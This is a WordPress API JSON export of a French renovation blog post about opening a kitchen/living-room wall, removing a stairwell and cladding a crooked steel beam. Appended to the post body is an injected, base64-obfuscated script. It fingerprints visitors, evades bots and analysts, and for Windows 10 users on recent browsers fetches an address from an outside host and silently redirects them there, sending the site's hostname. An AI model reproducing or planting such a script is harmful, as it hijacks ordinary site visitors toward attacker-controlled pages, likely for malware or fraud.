{"id":364,"date":"2020-04-30T14:18:23","date_gmt":"2020-04-30T12:18:23","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=364"},"modified":"2025-12-31T16:56:20","modified_gmt":"2025-12-31T15:56:20","slug":"ouverture-cuisine-salon-et-casse-de-la-cage-descalier","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2020\/04\/30\/ouverture-cuisine-salon-et-casse-de-la-cage-descalier\/","title":{"rendered":"Ouverture cuisine \/ salon et casse de la cage d&rsquo;escalier"},"content":{"rendered":"\n<p>Nous avons d\u00e9cid\u00e9 de doubler l&rsquo;ouverture entre le salon et la cuisine. L&rsquo;id\u00e9e \u00e9tait de  cr\u00e9er une grande pi\u00e8ce et d&rsquo;aider la chaleur du po\u00eale du salon \u00e0 passer dans la cuisine.<\/p>\n\n\n\n<p>Pour ce qui est de la cage d&rsquo;escalier, nous avons d\u00e9cid\u00e9 de la casser pour ouvrir l&rsquo;espace (gagner de l&rsquo;espace au sol et mieux profiter de la fen\u00eatre c\u00f4t\u00e9 nord).<\/p>\n\n\n\n<p>Pour ces 2 chantiers, nous avons fait appel \u00e0 un ma\u00e7on. <\/p>\n\n\n\n<p><strong>Cot\u00e9 escalier :<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-2-1024x576.jpg\" alt=\"\" class=\"wp-image-366\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-2-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-2-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-2-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-2.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Avant<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog4-1024x576.jpg\" alt=\"\" class=\"wp-image-372\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog4-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog4-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog4-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog4.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Apr\u00e8s<\/figcaption><\/figure>\n\n\n\n<p>Une fois que les artisans sont intervenus, Yohann a retir\u00e9 l&rsquo;isolation derri\u00e8re l&rsquo;escalier, retir\u00e9 l&rsquo;escalier avec l&rsquo;aide d&rsquo;Eric, et piquet\u00e9 le ciment.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1-1024x576.jpg\" alt=\"\" class=\"wp-image-368\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Et voil\u00e0 le travail !<\/figcaption><\/figure>\n\n\n\n<p><em><strong>C\u00f4t\u00e9 ouverture cuisine \/ salon :<\/strong><\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1024x576.jpg\" alt=\"\" class=\"wp-image-371\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Avant<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"879\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1-1024x879.jpg\" alt=\"\" class=\"wp-image-373\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1-1024x879.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1-300x257.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-9-1-768x659.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Apr\u00e8s<\/figcaption><\/figure>\n\n\n\n<p>Apr\u00e8s l&rsquo;intervention des ma\u00e7ons, il a fallu r\u00e9aliser l&rsquo;habillage de l&rsquo;IPN. Cela n&rsquo;a pas \u00e9t\u00e9 simple car l&rsquo;IPN n&rsquo;\u00e9tait pas droit et parce qu&rsquo;il fallait que nos plaques arrivent au niveau du mur existant. Il a fallu faire appel \u00e0 notre imagination !<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-7-1024x576.jpg\" alt=\"\" class=\"wp-image-369\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-7-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-7-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-7-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-7.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Une premi\u00e8re couche de placo, sur laquelle nous avons fix\u00e9 des tasseaux de bois.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-8-1024x576.jpg\" alt=\"\" class=\"wp-image-370\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-8-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-8-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-8-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-8.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Fixation de la 2e couche. <br>Nous avons coll\u00e9 la plaque du dessous au MAP en jouant sur l&rsquo;\u00e9paisseur de mati\u00e8re selon les endroits pour avoir un rendu droit malgr\u00e9 l&rsquo;IPN pench\u00e9.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-10-576x1024.jpg\" alt=\"\" class=\"wp-image-374\" width=\"431\" height=\"766\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-10-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-10-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-10-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-10.jpg 1000w\" sizes=\"auto, (max-width: 431px) 100vw, 431px\" \/><figcaption>Puis passage des gaines \u00e9lectriques dans la tranch\u00e9e. <\/figcaption><\/figure>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>Nous avons d\u00e9cid\u00e9 de doubler l&rsquo;ouverture entre le salon et la cuisine. L&rsquo;id\u00e9e \u00e9tait de cr\u00e9er une grande pi\u00e8ce et d&rsquo;aider la chaleur du po\u00eale du salon \u00e0 passer dans la cuisine. Pour ce qui est de la cage d&rsquo;escalier, nous avons d\u00e9cid\u00e9 de la casser pour ouvrir l&rsquo;espace (gagner de l&rsquo;espace au sol et &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2020\/04\/30\/ouverture-cuisine-salon-et-casse-de-la-cage-descalier\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;Ouverture cuisine \/ salon et casse de la cage d&rsquo;escalier&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-364","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=364"}],"version-history":[{"count":3,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions"}],"predecessor-version":[{"id":399,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions\/399"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=364"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}